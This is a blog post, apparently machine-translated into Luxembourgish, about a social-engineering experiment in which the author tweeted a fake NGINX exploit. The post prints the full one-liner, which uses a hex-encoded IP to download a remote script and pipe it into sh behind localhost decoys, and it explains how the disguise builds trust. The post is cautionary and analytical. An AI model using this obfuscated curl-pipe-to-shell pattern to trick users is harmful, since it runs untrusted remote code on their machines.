ProHoster > Blog > Administratioun > Erfolleg vun engem sozialen Experiment mat engem falschen Nginx Exploit

Erfolleg vun engem sozialen Experiment mat engem falschen Nginx Exploit

Note. iwwersat.: Auteur original Note, publizéiert 1. Juni, decidéiert en Experiment ënnert deenen interesséiert Informatiounen Sécherheet ze Exercice. Fir dëst ze maachen, huet hien e gefälschte Exploit fir eng onbekannte Schwachstelle am Webserver virbereet an et op sengem Twitter gepost. Seng Viraussetzungen - fir direkt vu Spezialisten ausgesat ze ginn, déi déi offensichtlech Täuschung am Code gesinn - sinn net nëmmen net richteg ginn ... Si hunn all Erwaardungen iwwerschratt, an an der Géigendeel Richtung: den Tweet krut enorm Ënnerstëtzung vu ville Leit, déi net kontrolléieren hiren Inhalt.

Erfolleg vun engem sozialen Experiment mat engem falschen Nginx Exploit

TL;DR: Benotzt keng Dateipipelining an sh oder bash ënner kengen Ëmstänn. Dëst ass e super Wee fir d'Kontroll iwwer Äre Computer ze verléieren.

Ech wëll mat Iech eng Kuerzgeschicht deelen iwwer e Comic PoC Exploit deen den 31. Mee erstallt gouf. Hie koum prompt an Äntwert op Neiegkeeten aus Alisa Esage Shevchenko, Member Zero Day Initiative (ZDI), datt d'Informatioun iwwer eng Schwachstelle am NGINX féiert zu RCE (Ferncode Ausféierung) geschwënn opgedeckt ginn. Zënter NGINX vill Websäiten dréit, muss d'Nouvelle eng Bomm gewiescht sinn. Awer wéinst Verspéidungen am Prozess "verantwortlech Offenbarung" waren d'Detailer vu wat geschitt ass net bekannt - dëst ass Standard ZDI Prozedur.

Erfolleg vun engem sozialen Experiment mat engem falschen Nginx Exploit
tweet iwwer Schwachstelle Verëffentlechung am NGINX

Nodeems ech un enger neier Verduebungstechnik am Curl geschafft hunn, hunn ech den ursprénglechen Tweet zitéiert an "e funktionnéierende PoC" aus enger eenzeger Zeil Code besteet, déi angeblech déi entdeckt Schwachstelle exploitéiert. Natierlech war dat komplett Blödsinn. Ech sinn dovunner ausgaangen, datt ech direkt ausgesat wier, an datt ech am beschten e puer Retweets géif kréien (oh well).

Erfolleg vun engem sozialen Experiment mat engem falschen Nginx Exploit
tweet mat falschen Ausbeutung

Ech konnt mer awer net virstellen wat duerno geschitt ass. D'Popularitéit vu mengem Tweet ass an d'Luucht gaangen. Iwwerraschend, am Moment (15:00 Moskauer Zäit 1. Juni) hu wéineg Leit gemierkt datt dëst e Fake ass. Vill Leit retweet et ouni et iwwerhaapt ze kontrolléieren (loosst eleng déi schéi ASCII Grafiken bewonneren déi se erausginn).

Erfolleg vun engem sozialen Experiment mat engem falschen Nginx Exploit
Kuckt just wéi schéin et ass!

Wärend all dës Schleifen a Faarwen super sinn, ass et kloer datt d'Leit Code op hirer Maschinn hu misse lafen fir se ze gesinn. Glécklecherweis funktionnéieren d'Browser déiselwecht Manéier, a kombinéiert mat der Tatsaach datt ech net wierklech a gesetzleche Probleemer wollt kommen, huet de Code, deen op menger Säit begruewe gouf, just Echo-Uriff gemaach ouni ze probéieren en zousätzleche Code z'installéieren oder auszeféieren.

Eng kleng Digression: netspooky, dnz, ech an déi aner Kärelen aus der Equipe Thugcrowd Mir hu fir eng Zäit laang mat verschiddene Weeër gespillt fir Curl Kommandoen ze verstoppen well et cool ass ... a mir sinn Geeks. netspooky an dnz hunn e puer nei Methoden entdeckt déi mir extrem villverspriechend ausgesinn hunn. Ech sinn am Spaass matgemaach a probéiert IP Dezimalkonversioune fir d'Täsch vun Tricken ze addéieren. Et stellt sech eraus datt IP och an hexadezimal Format ëmgewandelt ka ginn. Ausserdeem, Curl an déi meescht aner NIX Tools iessen glécklech hexadezimal IPs! Also et war just eng Fro vun enger iwwerzeegend a sécher ausgesinn Kommandozeil ze kreéieren. Schlussendlech hunn ech mech op dësem festgeluecht:

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

Sozio-elektronesch Ingenieur (SEE) ass méi wéi just Phishing

Sécherheet a Vertrautheet waren e groussen Deel vun dësem Experiment. Ech mengen si sinn wat zu sengem Succès gefouert. D'Kommandozeil implizéiert kloer Sécherheet andeems Dir op "127.0.0.1" (de bekannte localhost) referéiert. Localhost gëtt als sécher ugesinn an d'Donnéeën drop verloossen ni Äre Computer.

Bekanntheet war den zweete Schlëssel SEE Bestanddeel vum Experiment. Well d'Zilpublikum haaptsächlech aus Leit bestoung, déi mat de Grondsätz vun der Computersécherheet vertraut waren, war et wichteg Code ze kreéieren sou datt Deeler dovun vertraut a vertraut ausgesinn (an dofir sécher). Elementer vun alen Ausbeutungskonzepter ausléinen an se op eng ongewéinlech Manéier ze kombinéieren huet sech als ganz erfollegräich bewisen.

Drënner ass eng detailléiert Analyse vum One-Liner. Alles op dëser Lëscht dréit kosmetesch Natur, a praktesch näischt ass fir seng aktuell Operatioun néideg.

Wéi eng Komponente si wierklech néideg? Dëst -gsS, -O 0x0238f06a, |sh an de Webserver selwer. De Webserver huet keng béiswëlleg Instruktioune enthale, awer einfach ASCII Grafike mat Kommandoen servéiert echo am Skript enthalen an index.html. Wann de Benotzer eng Zeil mat |sh an der Mëtt, index.html gelueden an ausgefouert. Glécklecherweis haten d'Depoter vum Webserver keng schlecht Intentiounen.

  • ../../../%00 - representéiert iwwer d'Verzeechnes goen;
  • ngx_stream_module.so - Wee zu engem zoufälleg NGINX Modul;
  • /bin/sh%00<'protocol:TCP' - mir sinn supposéierter lancéiere /bin/sh op der Zilmaschinn a redirect d'Ausgab op den TCP Kanal;
  • -O 0x0238f06a#PLToffset - geheime Zutate, ergänzt #PLToffset, fir ze kucken wéi eng Erënnerungsoffset iergendwéi am PLT enthale sinn;
  • |sh; - aner wichteg Fragmenter. Mir hu missen d'Output op sh / bash viruleeden fir de Code auszeféieren deen aus dem attackéierende Webserver läit 0x0238f06a (2.56.240.x);
  • nc /dev/tcp/localhost - en Dummy an deem Netcat bezitt sech op /dev/tcp/localhostsou datt alles erëm sécher ausgesäit. Tatsächlech mécht et näischt an ass an der Linn fir Schéinheet abegraff.

Dëst schléisst d'Dekodéierung vum One-Line Skript an d'Diskussioun vun Aspekter vum "sozio-elektroneschen Ingenieur" (komplizéiert Phishing) of.

Web Server Konfiguratioun a Géigemoossnamen

Well déi grouss Majoritéit vu menge Abonnente Infosec/Hacker sinn, hunn ech décidéiert de Webserver e bësse méi resistent géint Ausdréck vun "Interesse" vun hirer Säit ze maachen, just fir datt d'Jongen eppes ze maachen hunn (an et wier Spaass ageriicht). Ech wäert net all Fallfall hei opzielen well d'Experiment nach ëmmer leeft, awer hei sinn e puer Saachen déi de Server mécht:

  • Iwwerwaacht aktiv Verdeelungsversuche op bestëmmte sozialen Netzwierker an ersetzt verschidde Virschau Miniatyren fir de Benotzer ze encouragéieren op de Link ze klicken.
  • Viruleedt Chrome/Mozilla/Safari/etc op den Thugcrowd Promotiounsvideo anstatt de Shell-Skript ze weisen.
  • Iwwerwaacht fir OFFENTLECH Unzeeche vun Andréngen / blatant Hacking, a fänkt dann un Ufroen op NSA Serveren ze redirectéieren (ha!).
  • Installéiert en Trojaner, souwéi e BIOS-Rootkit, op all Computer, deenen hir Benotzer den Host aus engem normale Browser besichen (just Geck!).

Erfolleg vun engem sozialen Experiment mat engem falschen Nginx Exploit
E klengen Deel vun Antimers

An dësem Fall war mäin eenzegt Zil e puer vun de Funktiounen vun Apache ze beherrschen - besonnesch déi cool Reegele fir Ufroen ëmzeleeën - an ech hu geduecht: firwat net?

NGINX Exploit (Real!)

Abonnéiert Iech op @alisaesage op Twitter a verfollegt dem ZDI seng super Aarbecht fir ganz reell Schwachstelle unzegoen an Méiglechkeeten an NGINX auszenotzen. Hir Aarbecht huet mech ëmmer faszinéiert an ech sinn dem Alice dankbar fir hir Gedold mat all de Mentiounen an Notifikatiounen, déi mäin domm Tweet verursaacht huet. Glécklecherweis huet et och e puer gutt gemaach: et huet gehollef d'Bewosstsinn vun NGINX Schwachstelle ze erhéijen, souwéi Probleemer verursaacht duerch Mëssbrauch vu Curl.

Source: will.com

Setzt e Commentaire